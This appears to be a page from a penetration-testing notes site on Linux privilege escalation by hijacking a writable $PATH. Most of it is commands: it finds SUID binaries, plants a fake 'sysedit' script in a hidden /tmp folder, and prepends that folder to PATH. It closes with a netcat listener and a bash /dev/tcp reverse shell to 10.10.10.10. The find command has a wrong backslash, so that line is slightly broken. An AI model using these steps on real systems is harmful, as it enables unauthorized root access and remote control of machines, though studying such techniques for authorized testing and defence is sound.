Writable $PATH

Path Hijacking

Identify the SUID file

find \ -perm -4000 2>/dev/null

For example, we found a file called /usr/bin/sysedit, and this binary is called from a random task or script that we control or we can execute.

Create a file with malicious content

We need to create a file with the same name as the SUID previously found:

mkdir /tmp/.my-things
cd !$
echo "#/bin/bash" > sysedit
echo "id > /tmp/.my-things/id.txt" >> sysedit

Update the $PATH variable

echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin

export PATH=/tmp/.my-things:$PATH

echo $PATH
# /tmp/.my-things:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin

With that, we are going to position our malicious folder (with the malicious file inside) as the first folder that the system will reach if the (in this case) sysedit file is invoked.

We need to execute the task or service that is calling that file again. And instead of the normal execution, we are going to see:

ls /tmp/.my-things
# id.txt

If we want a Reverse Shell

In the attack machine, we are going to listen to any port:

nc -lnvp 4460

Now create the file with the connection towards the attacker listener:

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4460 0>&1'" > sysedit

PreviousPrivilege Escalation NextEnumeration

Last updated 7 months ago